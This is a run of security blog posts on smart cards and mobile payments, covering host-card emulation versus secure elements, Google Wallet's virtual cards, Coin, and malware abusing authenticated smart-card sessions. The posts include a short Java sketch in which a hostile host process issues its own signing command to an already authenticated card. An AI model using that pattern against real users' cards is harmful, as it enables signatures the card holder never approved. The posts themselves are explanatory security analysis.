Dual-interface smart-cards and the problem of user intent (part I)

An earlier comparison of the security of NFC applications implemented with host-card emulation (HCE) against those using an embedded secure element noted that the SE hardware architecture allows for interface detection, a critical mitigation against remote relay attacks. This post expands on another application of the same feature: recognizing user intent in traditional smart-card scenarios, where the card is used in conjunction with an untrusted PC.

Smart-cards and malicious hosts

First a few words on the problem. Consider a standard use-case for smart cards: accessing a remote resource, such as SSH or remote-desktop into another machine in the cloud. In a high-assurance environment that would call for strong authentication– in other words, not passwords– using cryptographic keys managed on the card. A typical flow, sketched in code after the list, might be:

  • User initiates the action
  • Local machine prompts the user for their smart-card.
  • User inserts their card into the reader (or in the case of NFC, brings it into the field of the reader)
  • PIN prompt is displayed
  • User enters their PIN
  • The PIN is relayed to the card, authenticating the user to the card.
  • Once the card application is convinced it is dealing with the legitimate card-holder, it performs a cryptographic operation (such as signing a challenge) to authenticate the user to the remote resource.
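
For concreteness, here is a minimal sketch of that flow using the javax.smartcardio API and PIV-style commands. The AID, instruction codes and key reference follow published PIV conventions, but the PIN value, challenge and error handling are placeholders rather than what real middleware would ship.

    // Minimal sketch of the flow above using the javax.smartcardio API and
    // PIV-style commands (SELECT, VERIFY, GENERAL AUTHENTICATE). The PIN and
    // challenge are placeholders; real middleware also wraps the challenge in
    // a tagged dynamic-authentication template and handles many more errors.
    import java.util.List;
    import javax.smartcardio.*;

    public class RemoteAuthWithCard {
        public static void main(String[] args) throws Exception {
            List<CardTerminal> terminals = TerminalFactory.getDefault().terminals().list();
            Card card = terminals.get(0).connect("*");      // user has inserted their card
            CardChannel ch = card.getBasicChannel();

            // SELECT the PIV application by its well-known AID
            byte[] pivAid = {(byte) 0xA0, 0x00, 0x00, 0x03, 0x08, 0x00, 0x00, 0x10, 0x00, 0x01, 0x00};
            ch.transmit(new CommandAPDU(0x00, 0xA4, 0x04, 0x00, pivAid));

            // VERIFY: the PIN collected on the host travels to the card in the
            // clear, padded to 8 bytes with 0xFF per the PIV card specification
            byte[] pin = {'1', '2', '3', '4', '5', '6', (byte) 0xFF, (byte) 0xFF};
            ResponseAPDU r = ch.transmit(new CommandAPDU(0x00, 0x20, 0x00, 0x80, pin));
            if (r.getSW() != 0x9000) throw new IllegalStateException("PIN rejected");

            // GENERAL AUTHENTICATE: ask the card to sign a challenge from the
            // remote service with the PIV Authentication key (reference 0x9A)
            byte[] challenge = new byte[32];                // challenge supplied by the remote service
            ResponseAPDU signed = ch.transmit(new CommandAPDU(0x00, 0x87, 0x07, 0x9A, challenge));
            System.out.printf("signature response: %d bytes%n", signed.getData().length);
            card.disconnect(false);
        }
    }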

When preventing key recovery is not enough

Consider the problem of malware resident on the host PC. The card application and its communication interface are designed to prevent the extraction of secret key material via pure software attacks, such as exploiting a memory-corruption vulnerability. Let’s posit this is working correctly. Let’s further grant that the cryptographic primitives are not vulnerable to side-channel leaks (such as timing differences or padding oracles) that could be used to recover keys using software alone.

Smart-card meets hostile PC

Smart-card interacting with a hostile PC controlled by the adversary

That rules out the obvious avenue for malware to permanently exfiltrate cryptographic secrets out of the card and ship them off for future use. But the host can still ask the card to perform any operation using those secrets while the card is attached, because at the card level there is no concept of “user intent.” Looking at the typical architecture pictured above, there is a compromised PC running malware controlled by the adversary. A card reader is attached, typically via USB or a serial link, and the card is introduced to the reader, allowing the PC to issue commands to the card and receive responses in a standardized format known as APDU. Neither the card reader nor the card has any indication of the provenance of those APDUs, beyond the obvious fact that they originated from the host. There is no verifiable indication of which particular application sent the commands, or whether that application is acting on behalf of the legitimate card-holder or carrying out its own agenda. In effect, the card is just a passenger along for the ride, with PC software calling the shots on exactly what messages are signed, decrypted or otherwise processed using the card. After the card is attached to the system and the user has authenticated, there is an implicit channel (red dashes above) available to the malware for issuing arbitrary requests to the card.

Just to drive home the point that this is not a hypothetical scenario– and the choice of a US government PIV card for illustration above is not entirely coincidental– in 2012 AlienVault reported that the Sykipot malware was targeting smart cards by using a key-logger to capture PINs and later issuing its own commands to the card.

Working around PIN checks

Requiring PIN entry, as many card applications do before performing sensitive operations, does not solve this problem. In the most common scenario, the PIN is entered locally on the compromised PC. This input can be intercepted by malware running at sufficiently high privilege and replayed at any later time to authenticate to the card and perform whatever private-key operations the attacker desires.

Consider the more advanced case observed in defense and banking scenarios where an external PIN-entry device is used. This is a distinct piece of hardware with its own numeric key-pad. Individual keystrokes are not shipped to the PC; instead the entire PIN is delivered to the card as part of a PIN verification command. (Since the format of that command varies by card application, this must be decided upon in advance and programmed into the PIN-pad firmware.) While this hides the PIN from malware resident on the host, it does not stop the malware from free-riding on the authenticated channel after PIN verification is done. After all, PIN entry is being done at the behest of some application the user started– for example, their email client trying to decrypt an encrypted message. No social engineering is required here; malware can simply wait until the user has a legitimate reason to enter their PIN on the external device because some other application requested card usage. As long as the attacker can take control of that application– which is often doable without special privileges– or, more directly, take control of the PC/SC interface handling all card communication, additional commands can be injected for processing by the on-card application.
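
To make the free-riding concrete, here is a rough sketch of what a malicious process on the same host could do once the card is powered and the user has already been authenticated. The commands are PIV-style placeholders, and whether the earlier PIN verification still applies depends on the card and middleware; the point is simply that nothing in the APDU identifies who is asking or why.

    // Sketch of a "free rider": a second, unrelated process opens the same
    // reader and issues its own signing command. The card sees only APDUs and
    // has no way to tell this request apart from one made on the user's behalf.
    import javax.smartcardio.*;

    public class FreeRider {
        public static void main(String[] args) throws Exception {
            CardTerminal reader = TerminalFactory.getDefault().terminals().list().get(0);
            Card card = reader.connect("*");            // shared PC/SC connection; card is not reset
            CardChannel ch = card.getBasicChannel();

            // Re-select the PIV application, then request a signature over
            // attacker-chosen data using the same command a legitimate client uses
            byte[] pivAid = {(byte) 0xA0, 0x00, 0x00, 0x03, 0x08, 0x00, 0x00, 0x10, 0x00, 0x01, 0x00};
            ch.transmit(new CommandAPDU(0x00, 0xA4, 0x04, 0x00, pivAid));
            byte[] attackerDigest = new byte[32];       // digest of a message the attacker wants signed
            ResponseAPDU r = ch.transmit(new CommandAPDU(0x00, 0x87, 0x07, 0x9A, attackerDigest));
            System.out.printf("status word: %04X%n", r.getSW());
        }
    }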

Towards establishing user intent

Some “card”-like devices in the form of USB tokens have a button or similar input on the device itself to establish user intent. (There are also cards with their own PIN pad to avoid the untrusted entry path problem; a single button for confirming a transaction is effectively a special case of that design.) This creates a user nuisance in exchange for marginal security. It does prevent the card from being commandeered by malware on the host, since sensitive operations require the user to take action. On the other hand, the user still has no idea what operation is about to be performed when they press the button. For example, is the token going to sign the document they submitted or another message chosen by malware? Suppose there is an error message saying the operation did not succeed and needs to be repeated; is there a way to distinguish an “honest” error from malware having hijacked the click for its own purposes?

Interface detection on dual-interface cards can emulate these button presses, but it can do one better by allowing the user to verify exactly what is being requested of the card.

[continued]

CP

 


Is NFC host card-emulation safe for payments? (part II)

[continued from part I]

(Full disclosure: This blogger worked on Google Wallet security)

Card security in perspective: curious case of chip & PIN

Not disturbing the precarious optimal-risk equilibrium is one reason EMV adoption has proceeded at a leisurely pace in the US. For what seems like a decade, every year has been the year of chip & PIN, when the vaunted technology would finally hit the inflection point. (It may finally be happening in 2015 if the card networks do not blink and stick to their ultimatum on the liability shift.) Target and similar large-scale data breaches deserve much of the credit for accelerating the schedule, thanks to negative publicity and a decline in consumer confidence– so much so that consumers have reported favoring cash in the aftermath of the Target breach, a counterproductive reaction that may aggravate risks via theft and loss.

If one focuses on technology alone, it seems puzzling at first why card networks have not embarked on a crash program to upgrade point-of-sale terminals and cards across the board. After all, there is really no comparison in terms of security between swipe and chip transactions. Granted, EMV payment protocols are far from perfect: several design flaws have been identified and published in the literature. But even with known (and difficult to fix) defects, chip & PIN represents a major improvement over swipe transactions, mitigating entire classes of vulnerabilities. That “puzzle” goes away once the full business impact is taken into account. Rolling out EMV in a setting accustomed to swipe transactions is a difficult task. Whatever gains are made locally in reducing fraud may be more than offset by the global cost of the massive undertaking required to upgrade merchants and reissue cards, not to mention user confusion caused by unfamiliar technology– which is another reason the expected model in the US will involve chip & signature as opposed to PIN entry, in keeping with the familiar ritual of signing pieces of paper.

HCE and risk management

The parallel with the interminable saga of US chip & PIN adoption is not entirely accurate for HCE/SE. In the first case, chip cards had the formidable problem of displacing a “good enough” installed base. By contrast NFC payments very much remain a green-field, and in principle there is no backwards compatibility problem holding back SE deployment. While merchants have to upgrade to NFC terminals and consumers need to purchase handsets equipped with NFC, once they have made that investment there is no reason to prefer HCE over SE.

In fact the technologically superior solution involving hardware secure elements was first on the scene. It even enjoyed a natural head start: an SE inside a phone represents an incremental evolution of existing standards, leveraging the same tried-and-true hardware already deployed in chip & PIN cards, repackaged in a slightly different configuration. (Of course reality is not quite that simple: surrounding that secure chip with an always-on, always-connected and highly exposed general-purpose computer introduces all sorts of new risks, such as remote relay attacks.) By contrast, payments based on host-card emulation call for new tokenization standards, designed to compensate for the lower security-assurance level of a mobile OS by leaning heavily on online connectivity instead.

So why the frenzy over HCE? Because for the first time it makes contactless payments broadly accessible to enterprising upstarts who were previously marginalized by the “cabal” of secure element manufacturers, TSM operators and wireless carriers. The barrier to entry is lowered to writing an ordinary Android app, along with meeting basic requirements from Visa/MasterCard/AmEx etc. That means more mobile applications developed to run on more mobile devices, carrying credit cards from a wide spectrum of issuers, all adding up to many more transactions by volume and frequency. In other words, more interchange fees to go around for all participants in the ecosystem. By contrast, the deployment of secure element solutions has been stalled by wireless carriers’ intransigence against Google Wallet, coupled with challenges in executing on their own rival project ISIS– now getting rebranded to avoid confusion with the Iraqi Al-Qaeda faction. (The jury is out on whether the Iraqi terrorist group should be more ashamed of sharing the name.) As for Google Wallet, its install counts and user ratings have skyrocketed after switching to host card emulation. After all, an app that users cannot run because of their wireless carrier has precious little utility, no matter how impressed the lucky few are.

What of the alleged decrease in security? Looking at the big picture places the HCE risks in better perspective. First, any fraud in question is constrained to card-present, in-person transactions, which are quite a bit more difficult to scale than card-not-present transactions that can be conducted from anywhere in the world. (If issuers are careful, they can further constrain potential fraud to NFC transactions only, by blocking the by-design ability to replay NFC track data on a plain magnetic stripe.) Second, attacks targeting the physical manifestation of the payment instrument– e.g. magnetic stripe, chip & PIN card or mobile device– are only one subset of risks in the system. For example, HCE versus secure element has no bearing on the safety of merchant terminals. Finally, payment networks have defense-in-depth: additional security features designed to detect and prevent attacks that succeed in subverting card security. Most visibly, each issuer operates a “back-end” risk engine capable of vetoing transactions even if all of the authorization data from the card looks correct. Defeating the security of the physical payment instrument– be it an old-school magnetic stripe or a mobile device with NFC– is only the first step: the enterprising fraudster also needs to run the gauntlet of statistical models optimized to detect anomalous spending.

So the argument over HCE amounts to splitting hairs over one very specific attack vector. Gemalto is getting wrapped around the axle over what will be, at worst, a negligible increase in fraud. It may even result in a net decrease by driving adoption of NFC and increasing the percentage of transactions not involving magnetic stripes. To the extent that anyone can predict which of these scenarios is more likely to play out, it is the card networks.

CP


Is NFC host card-emulation safe for payments? (part I)

An earlier series of posts compared the security properties of NFC applications implemented using host card-emulation against the same scenario backed by a dedicated hardware secure element. It was not much of a contest; hardware SE easily wins on raw security considerations:

  1. Much stronger tamper-resistance against attacks involving physical access
  2. Greatly reduced attack surface, due to stripped down operating system and locked-down application ecosystem, unlike the anything-goes approach to third-party applications on the average phone
  3. Possible to protect against attacks originating from the host operating system itself
  4. Defense against remote relay attacks using interface detection on the NFC controller

It’s natural to ask: does this mean HCE is not suitable for payments? There have been vocal critics making precisely that claim. NFC Times quotes the Gemalto CEO pursuing this line of argument. Of course Gemalto has a significant business in providing UICC chips– a type of hardware secure element in SIM form factor– to wireless carriers, who are currently making a desperate land-grab push in the payments space. Having cast its lot with carriers and already reeling from MasterCard/Visa support for HCE, it is not surprising the company does not look kindly on HCE displacing extra hardware. But Gemalto is not alone in trying to “rescue” the world from NFC payments without an SE. Whether it is TrustZone or some other snake-oil solution, every vendor seems to have latched onto the failure of secure elements to gain market traction as an opportunity to trumpet an alternative to “save” payments from the perils of HCE.

Risk-management versus risk-elimination

The first observation is that keeping the fraud level in payments down is a problem of risk management. It is about keeping the frequency and total losses from fraud down to an “optimal level” and distributing the liability appropriately within the system. More surprising is that the optimal level need not be zero, and consumers may be just fine with that arrangement as long as the consequences are not reflected directly on the individual card holder. That second property is important because “optimal” risk can be very different for each participant in the system:

  • Issuing bank that underwrites the card, for example Citibank issuing a MasterCard.
  • Card network facilitating the transactions, e.g. MasterCard.
  • Merchants that accept a particular brand of payment cards
  • Acquiring banks and payment processors helping that merchant accept card transactions
  • Individual card holders

Optimization problem

With the exception of the card-holder, all of these participants are effectively trying to maximize profit. (Strictly speaking, some issuing banks can be non-profit institutions such as credit unions.) Minimizing fraud is only relevant to the extent that it furthers that objective. This is an important distinction. Earning $100 but losing $10 to fraud may be preferable to earning $50 while only suffering $1 in losses. Granted, absolute amounts are not the only concern; increased fraud rates may have second-order effects such as discouraging consumers or merchants from using credit cards. But all of these effects can be quantified. All else being equal, increasing the number and dollar amount of transactions is in the interest of all participants except possibly the card-holder. Security measures designed to combat fraud can end up being counter-productive if they introduce friction, cause transactions to become less reliable or otherwise decrease the revenue stream for the participants. Conversely, a technology that is less “safe” in the absolute sense may be preferable for these participants if it boosts overall activity in the ecosystem, provided the attendant fraud can be managed.

Consumer view

Card holders, however, face a different problem, since they cannot “average” away profit and loss across many cards. One incident of fraud maxing out a single credit card is a drop in the bucket for Citibank; that same amount can be very significant for the customer involved, enough to wipe out their savings. It does not help that there is great information asymmetry: card networks know a lot about the incidence and impact of fraud, while this information is generally not available to consumers, making it difficult for them to estimate risks. (Is it safe to pay with a credit card online? What about at a street fair?) Worse, they have little negotiating power to set terms, beyond a rudimentary version of “voting with the wallet” by choosing from different banks’ offerings on take-it-or-leave-it terms.

Fortunately this is where regulation comes in. Consumer protection laws can compensate for the information asymmetry and lack of bargaining power by creating a baseline of fraud protection that all issuers must adhere to. Such regulations can limit the downside, indemnifying users from losses. The prevailing arrangement in the US via the Fair Credit Billing Act (FCBA) leads to exactly this outcome. Consumers are not liable for fraudulent transactions, a fact repeatedly drilled in by many an advertisement harping on “zero liability.” Of course what this means more precisely is that we are not directly responsible for reimbursing the issuing bank, merchant or whoever ended up absorbing the loss. Instead those losses are “diffused” across the system and reflected back to consumers in the form of higher prices at stores (which price in the expected incidence of charge-backs), higher interest rates on balances carried or a greater cut taken by middlemen to offset expected losses.

With consumers effectively neutralized in this manner, card networks have great leverage to move risk around the system, squeezing either banks (unlikely) or, more commonly, merchants. Similarly they are free to set standards on the design and operation of payment technologies without having to face significant consumer backlash. The average card-holder has little direct stake in whether that PIN pad is really living up to its tamper-resistance promise or that point-of-sale terminal has been compromised by malware waiting to skim cards. If there is a security problem anywhere in this chain, it is someone else’s problem to make the consumer whole.

[continued]

CP


Coin vs Google Wallet: security improvements over plastic (part III)

Earlier posts looked at how Coin and Google Wallet take different approaches to presenting a wallet experience that can draw on multiple credit cards. This post looks at how they compare against traditional plastic cards in security. Specifically, we focus on two common threats both technologies face:

  • Theft/loss of the card. This also includes temporary access to the card by the adversary, such as settling a bill at a restaurant when the server briefly gets full access. (Although NFC payments are not typically used in this setting, we can extrapolate to the equivalent hypothetical scenario where the phone is tapped against a hostile point-of-sale terminal.)
  • Data breach occurring at a merchant where the card is used, or upstream at the payment processor used by the merchant. The Target breach late last year and the more recent PF Chang’s breach are examples of the first scenario, while the 2012 attack against Global Payments falls into the latter category.

Theft or loss of device

While Coin has not been released yet, from the FAQ and a demonstration video one can surmise two features:

  • The magnetic stripe does not carry card information at all times. The data is only present around transaction time, limiting the window of exposure. If bad guys get hold of the card outside that window, there is nothing to read out of the stripe directly. (Contrast this with traditional plastic cards, where the information can be read at any time.)
  • Physical proximity to the phone is required. The card locks up when it is out of range, as measured by Bluetooth signal strength. A corollary is that theft of the card alone is not directly useful, unless the thief also manages to get hold of the phone.

There is a caveat associated with both of these mitigations: they rely on the tamper-resistance of the hardware powering Coin. After all, the track data is still present inside the card, lurking somewhere in persistent storage; it is just not reflected on the dynamic stripe. If an attacker can extract this information by targeting the storage, they could obtain track data for all stored cards. Similar to the problem of extracting the cryptographic keys embedded in a chip & PIN card, this is an attack against the physical tamper-resistance of the hardware. At the moment little is known about the hardware inside Coin. There are standard benchmarks for evaluating the physical security of cryptographic hardware, such as the United States government’s FIPS 140-2 standard and the Common Criteria framework. Popular models of smart-cards often boast a FIPS 140 or CC certification level, and EMV payment applications typically require such a certification before the hardware can be used to implement payment protocols. It is unclear if similar requirements will apply to Coin.

For Google Wallet, the main defense against theft is a PIN. Tap-and-pay is only possible when the application has been unlocked “recently” by entering the correct PIN, based on a configurable time interval. In earlier incarnations of the product that leveraged the embedded secure element, this period defaulted to 5 minutes. More recent versions based on host-card emulation extend that to 24 hours. That means if the user made a transaction recently, the device is “armed” and ready for future purchases by simply turning on the screen. Even unlocking the phone itself– such as by entering a pattern or PIN– is not required. Payments only require that the display is on, which is used as the signal to power on the NFC controller.

Tamper-resistance used to be an important part of the threat model for earlier versions of Google Wallet, since long-lived cryptographic keys were stored on the embedded secure element. Physical attacks against the SE could result in the extraction of these keys, allowing “cloning” of the card. (Unlike Coin, however, SE hardware has a proven track record and pedigree: both the NXP SmartMX and Oberthur/ST33 families have undergone Common Criteria evaluation.) But later iterations of Wallet dropped support for the SE in favor of NFC host card emulation, managing payment credentials on the main Android application processor. While there is no pretense of tamper-resistance on that platform, HCE also changes the key management model for payments. Instead of trying to secure a single key over an extended period of time, new keys are periodically downloaded from the cloud on demand, after authenticating the user. This also serves as a useful mitigating factor against theft of the device: even sophisticated attackers who can extract the secrets associated with the Android application will not be able to create a functional replica that keeps working once those short-lived keys expire.

Skimming and compromised merchants

Google Wallet fares better than Coin against skimming and hostile point-of-sale terminals. Recall that while the Coin card can suppress any data from appearing on the magnetic stripe until the moment of transaction, when that swipe does eventually happen, the data surrendered to the reader will be an identical clone of one of the user’s existing cards. The Coin FAQ admits as much:

“A Coin is no less susceptible than your current cards to other forms of skimming that capture data encoded in the magnetic stripe as the card is swiped.”

By contrast, NFC payments produce “simulated” track data with two components that change for each purchase: an incrementing transaction counter and a dynamic card-validation code, or CVC3, computed jointly by the reader and wallet application in a challenge-response protocol. In other words the track data is constantly changing, unlike the static picture presented by Coin to every cash register. Even if an attacker commands a malicious NFC terminal and observes several different CVC3 values, they cannot recreate the future CVC3 values necessary to successfully authorize a different transaction. (More details about the construction of the simulated mag-stripe data appear in earlier posts about a hypothetical scenario: paying with NFC at Target when the retailer was still under attack– hypothetical because Target has not rolled out NFC.)
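
As an illustration of why observed values do not help predict future ones, here is a toy sketch of a dynamic code computed as a truncated keyed MAC over the transaction counter and the reader's challenge. This is not the actual PayPass CVC3 derivation (which uses card-specific 3DES session keys and a prescribed data layout), only the general shape of the construction.

    // Toy dynamic-code sketch: a short code derived from a per-card secret,
    // the transaction counter and the reader's unpredictable number. Without
    // the key, previously observed codes reveal nothing about future ones.
    import java.nio.ByteBuffer;
    import javax.crypto.Mac;
    import javax.crypto.spec.SecretKeySpec;

    public class DynamicCodeSketch {
        static int dynamicCode(byte[] cardKey, int counter, int readerChallenge) throws Exception {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(new SecretKeySpec(cardKey, "HmacSHA256"));
            byte[] tag = mac.doFinal(ByteBuffer.allocate(8).putInt(counter).putInt(readerChallenge).array());
            return ((tag[0] & 0xFF) << 8 | (tag[1] & 0xFF)) % 1000;   // truncate to three decimal digits
        }

        public static void main(String[] args) throws Exception {
            byte[] key = new byte[16];                                // placeholder for a per-card secret
            System.out.println(dynamicCode(key, 41, 0x1A2B3C4D));     // each purchase uses a fresh
            System.out.println(dynamicCode(key, 42, 0x5E6F7081));     // counter and challenge
        }
    }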

Even more importantly, the virtual card used by Google Wallet to redirect payments is completely decoupled from the “real” plastic cards the consumer added to their wallet as funding sources. Nothing about the original cards– not the cardholder name, the expiration date or even the types of cards (Visa/MC/AmEx/Discover) present in the wallet– can be inferred from use of the virtual card. This in itself is very useful when recovering from a breach: even if merchant terminals had been completely compromised a la Target, there is no need to cancel and reissue the physical credit cards of customers who paid with Google Wallet. The only “card” at risk is the virtual one issued by Google for proxying transactions, and it is Google’s problem to reissue that card– which is as easy as provisioning a new one over the air to the phone. Banks that issued the “real,” tangible cards safely hidden on the other side of those transactions need not worry about shipping new pieces of plastic to their customers.

CP


Host-card emulation and interop with multiple NFC wallets

Can multiple NFC tap-and-pay applications coexist on the same phone? The premise may sound overly ambitious, considering that getting even a single wallet to work has been a challenge during this nascent period of mobile payments. Until recently Google Wallet was only available on Sprint and unlocked T-Mobile/AT&T devices, while the ISIS project from US wireless carriers depends on switching to a special SIM card.

This quagmire was caused less by any inherent limitation in the technology and more by strategic maneuvering on the part of wireless carriers and OEMs to control payments. Both the embedded secure element originally used by Google Wallet and the new UICC hardware required for ISIS support the presence of multiple applications, in accordance with GlobalPlatform specifications. In principle that permits multiple wallets to co-exist on the same hardware, but the catch is that secure elements are locked-down platforms. Users cannot install their own choice of applications; special privileges, typically obtained via contractual arrangements with the entity controlling the chip, are required. Such deals have not materialized at scale.

Host-card emulation offers one way out of the quagmire by removing the dependency on the secure element. Payment applications no longer require a secure element– only the NFC controller– nor the ability to install new applets on a dedicated SE, nor special privileges for interfacing with the SE from an Android application. Does this solve the problem of multiple wallets? That depends on the definition of what it means for multiple wallets to coexist on the same device.

Detour: NFC transactions

Before diving into why having multiple wallets coexist is still a challenge, here is a quick primer on how an EMV contactless transaction operates, starting from the moment the customer brings their device into the induction field of the NFC reader:

  • Terminal detects the presence of an NFC type-4 tag, or what Android calls IsoDep.
  • A connection is set-up for exchanging messages called APDU or Application Protocol Data Unit.
  • Terminal activates the PPSE (Proximity Payment System Environment) application by sending an APDU containing a SELECT command with the well-known AID for PPSE (sketched in code after this list).
  • Terminal interacts with the PPSE to get a list of payment instruments available on the “card” (which in this case is actually a phone operating in NFC card-emulation mode). Each instrument is represented by a unique AID, listed in order of user preference. For example, if the user prefers to pay with their Discover card and use Visa as a fallback in case Discover is not honored by the merchant, PPSE would present two AIDs with the Discover application appearing first.
  • Based on user preferences and merchant capabilities, one of these options is chosen by the terminal.
  • The terminal SELECTs the chosen payment application by AID and executes the network-specific protocol, such as PayPass for MasterCard or payWave for Visa.
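
As a small, self-contained illustration of the opening step, here is how the terminal’s SELECT command for the contactless PPSE is put together; the directory name “2PAY.SYS.DDF01” doubles as the AID. The bytes follow the standard SELECT-by-name layout, with the surrounding transport omitted.

    // Construct the SELECT APDU a terminal sends to activate the PPSE.
    import java.nio.charset.StandardCharsets;

    public class SelectPpse {
        public static void main(String[] args) {
            byte[] name = "2PAY.SYS.DDF01".getBytes(StandardCharsets.US_ASCII);
            byte[] apdu = new byte[6 + name.length];
            apdu[0] = 0x00;                        // CLA
            apdu[1] = (byte) 0xA4;                 // INS: SELECT
            apdu[2] = 0x04;                        // P1: select by name (AID)
            apdu[3] = 0x00;                        // P2: first or only occurrence
            apdu[4] = (byte) name.length;          // Lc: length of the AID
            System.arraycopy(name, 0, apdu, 5, name.length);
            apdu[apdu.length - 1] = 0x00;          // Le: expect the FCI template in response

            // The response lists the available payment applications (AIDs) in
            // priority order; the terminal then SELECTs one of them by AID.
            for (byte b : apdu) System.out.printf("%02X ", b);
            System.out.println();
        }
    }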

One wallet at a time

Screenshot from Android 4.4 showing tap & pay settings

Tap & Pay settings from KitKat

Designating a single application for payments is straightforward: the Android Settings app features a dedicated view to pick between the available options. Under the hood, that setting controls routing for a specific AID: the one reserved for PPSE. The expectation is that each mobile wallet capable of handling NFC payments will declare that it can handle PPSE as well as the AID prefixes associated with different networks (for example A000000004 for MasterCard).

There is one subtlety: the syntax used for declaring HCE services permits the application to define groups such that either all or none of the AIDs in a group will be routed to the application. This avoids the situation where PPSE and the card AIDs get out of sync. Consider two wallet applications, each containing a MasterCard. If the user decides to activate the first one, all future PPSE traffic will be routed there. But if the AID prefix for MasterCard remained associated with wallet #2, an inconsistent transaction state would arise: the PPSE emulated by wallet #1 is used to pick a card for payment, but the actual payment is handled by wallet #2, contrary to user preference.
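
A hypothetical sketch of that grouping on Android, using the dynamic AID registration API (the same grouping can be declared statically in the service’s XML resource): the PPSE name and the network AID are registered together under the payment category, so routing cannot split them across wallets. The service class name and package are made up for illustration.

    // Register the PPSE AID and a network AID as one payment group so they
    // always route to the same wallet. The HostApduService named here is a
    // hypothetical class implemented elsewhere in the app.
    import android.content.ComponentName;
    import android.content.Context;
    import android.nfc.NfcAdapter;
    import android.nfc.cardemulation.CardEmulation;
    import java.util.Arrays;

    public class AidRegistration {
        static void registerPaymentAids(Context context) {
            CardEmulation ce = CardEmulation.getInstance(NfcAdapter.getDefaultAdapter(context));
            ComponentName service = new ComponentName(context.getPackageName(),
                    "com.example.wallet.MyHceService");       // hypothetical HostApduService
            ce.registerAidsForService(service, CardEmulation.CATEGORY_PAYMENT, Arrays.asList(
                    "325041592E5359532E4444463031",           // "2PAY.SYS.DDF01" (PPSE) in hex
                    "A0000000041010"));                       // MasterCard payment application AID
        }
    }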

Multiple active wallets

While the scenario of a single NFC payment application is handled gracefully, the same approach does not work for combining multiple cards from different wallets.

The problem is the directory view presented by the PPSE. Because PPSE is routed to one specific wallet, at any point only the payment options associated with that application are available for NFC payments. Each wallet application maintains its own directory of cards, blissfully unaware of other wallets installed on the same device. Using another card associated with a different mobile payment application requires changing the PPSE routing.

There is no system-wide PPSE instance to aggregate cards from multiple payment applications and present a unified view to the point-of-sale terminal, containing all the payment options available to that customer. (Strictly speaking, it does not have to be an OS feature. In principle payment apps could agree on a standard among themselves to use Android intents for communicating card information to each other. But this assumes products from competing providers will cooperate for the higher cause of serving the user, possibly to their own detriment when a competitor’s payment option is prioritized above their own. That is asking a bit too much, which is why such functionality is best centralized in the core operating system.)

CP


Coin vs Google Wallet: comparing card-aggregation designs (part II)

[continued from part I]

Google Wallet: one more level of indirection

“All problems in computer science can be solved by another level of indirection.” — attributed to computer science pioneer David Wheeler

Google takes a very different approach to supporting multiple cards in a mobile wallet. Instead of carrying a literal representation of all the payment instruments, they are all hidden behind a “virtual card” which can effectively redirect transactions to any of these original credit cards. But this routing is done in real-time via the payment network itself, instead of trying to recreate a bitwise clone of the card.

Google Wallet: using virtual cards to proxy transactions

Google Wallet and virtual cards

Virtual cards

The picture above illustrates how this works, in the context of mobile payments using an Android phone over NFC. (Note that Google also launched an ordinary plastic card in 2013 which has slightly different functionality. In this example we cover the better-known NFC payment scenario where the existence of the virtual card is less obvious.)

Users have one or more backing instruments or funding sources in their wallet. These are standard credit cards, “added” to the conceptual wallet once by entering the card number and other relevant details such as expiration and CVC2 on a web page or in the mobile application, much like one would enter credit-card information when making an online purchase. This step is the rough equivalent of the swipe-magnetic-stripe/photograph/confirm sequence used by Coin when adding cards. At any given time, exactly one of these backing instruments is active, which is to say transactions will be charged to that card. Also much like Coin, the Google Wallet mobile app has UI for selecting among the options.

Proxying transactions in real-time

Where the two models diverge despite superficial similarities in UI metaphors is what happens during a transaction. When Google Wallet is used for an in-store NFC purchase, the credit card seen by the point-of-sale terminal is not any of the actual backing instruments. Instead it is a virtual card, unique to that instance of Google Wallet. Each user, and even each instance of the wallet application associated with a given user, has its own virtual card provisioned. In one sense, this card is very “real”: it is a full-fledged MasterCard effectively issued on behalf of Google, accepted at any NFC terminal that supports the MasterCard PayPass protocol. It has an ordinary 16-digit card number with a prefix associated with the MasterCard network, an expiration date and, for NFC transactions, cryptographic keys used to generate the dynamic CVC. It is only “virtual” in the sense that its existence is not explicitly surfaced. For example, nowhere in the mobile app are the card number or other details about this card revealed to the user, although one can often spot the last 4 digits printed on paper receipts. (In principle a determined user could simulate the NFC transaction with their own reader to observe the card number, since this is part of the simulated track data exchanged in the clear as part of PayPass.) Consequently it is never directly handled by the end-user– never entered into a form on a web page or recited over the phone. Nor does it ever appear on a consumer credit report as an additional card, much like a prepaid card would not show up as a line of credit.

When a user makes an NFC transaction with Google Wallet, the payment network– MasterCard in this case– routes the authorization request to Google, the nominal issuer of the virtual card. Google in turn places a payment request on the active backing card for the exact same amount. Depending on the outcome of that second authorization, the original “front-end” transaction is approved or declined. All of this is done in real time, and must complete in a matter of seconds to comply with network rules around transaction deadlines.
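
To make the two-legged flow concrete, here is a toy sketch of the proxying. This is not Google’s implementation; the gateway interface, names and types are invented for illustration.

    // Toy proxy: an authorization arriving for the virtual card triggers a
    // matching card-not-present charge on whichever backing card is active,
    // and the front-end decision simply mirrors that outcome.
    import java.util.Map;

    public class VirtualCardProxy {
        // Hypothetical interface for placing a card-not-present charge
        interface BackingCardGateway {
            boolean charge(String backingCardId, long amountCents, String merchant);
        }

        private final BackingCardGateway gateway;
        private final Map<String, String> activeBackingCard;   // virtual PAN -> active funding source

        VirtualCardProxy(BackingCardGateway gateway, Map<String, String> activeBackingCard) {
            this.gateway = gateway;
            this.activeBackingCard = activeBackingCard;
        }

        // Called when the network routes an authorization for a virtual card here
        boolean authorize(String virtualPan, long amountCents, String merchant) {
            String backing = activeBackingCard.get(virtualPan);
            if (backing == null) return false;                  // decline: no funding source selected
            // Same amount, placed in real time; the card-present transaction at the
            // point of sale is approved only if this card-not-present charge succeeds.
            return gateway.charge(backing, amountCents, merchant);
        }
    }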

Two transactions in one

There are interesting consequences to this design. The first is that Google plays dual roles:

  • Issuer: As far as the merchant is concerned, Google is the issuer for the card the customer just used. (Nominally Google partners with Bancorp Bank for this purpose, with Bancorp ending up as the issuer of record, as described in the Wallet FAQ entry.)
  • Merchant: As far as the original issuer of the backing card is concerned, Google is a merchant requesting payment authorization from that card.

